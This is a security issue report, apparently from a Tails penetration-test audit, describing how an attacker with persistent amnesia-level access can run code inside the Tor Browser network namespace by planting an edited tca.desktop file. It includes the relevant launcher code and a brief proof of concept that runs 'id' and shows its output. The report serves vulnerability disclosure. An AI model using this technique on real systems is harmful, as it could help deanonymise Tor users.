attacker can execute code in tor-browser network namespace

See https://git.radicallyopensecurity.com/otf/pen-tails/-/issues/4

This attack applies if an attacker has amnesia-level and Tor is not bootstrapped.

Summary

Impact

The attacker can gain information about your Tor Browser circuits, which could be used to deanonymize the user.

Overall, this will be considered Low in summit#191

Availability

The attack is only available when the attacker has amnesia-level privileges before the user connects to Tor. This requires a persistent attack (ie: in the past the attacker used to have amnesia-level privileges, and managed to persist themselves into the Persistent Storage), so this needs to be chained with more attacks to be done.

It also requires user interaction (citation needed).

Details

Relevant code

On /usr/local/lib/run-tor-browser:

exec \
  /bin/ip netns exec tbb \
  sudo -u amnesia -- \
  /usr/local/lib/run-with-env --env-file="${ENVFILE}" --delete -- \
  /usr/local/lib/run-with-ibus-and-a11y-bus-proxy -- \
  /usr/bin/tor-browser "$@"

On /usr/bin/tor-browser :

if tor_has_bootstrapped || ask_for_confirmation; then
    # Torbutton 1.5.1+ uses those environment variables
    export TOR_SOCKS_HOST='127.0.0.1'
    export TOR_SOCKS_PORT='9050'

    start_browser "${@}"
else
    gtk-launch tca.desktop
fi

PoC

cp /usr/share/applications/tca.desktop /home/amnesia/.local/share/applications/

# Edit the file and change Exec= to anything you want e.g.
Exec=sh -c 'echo `id`'

# Trigger code exec
/usr/local/lib/run-tor-browser

# example output, nogroup means we are inside the brawp sandbox
amnesia@amnesia:~$ /usr/local/lib/run-tor-browser
uid=1000(amnesia) gid=1000(amnesia) groups=1000(amnesia),65534(nogroup)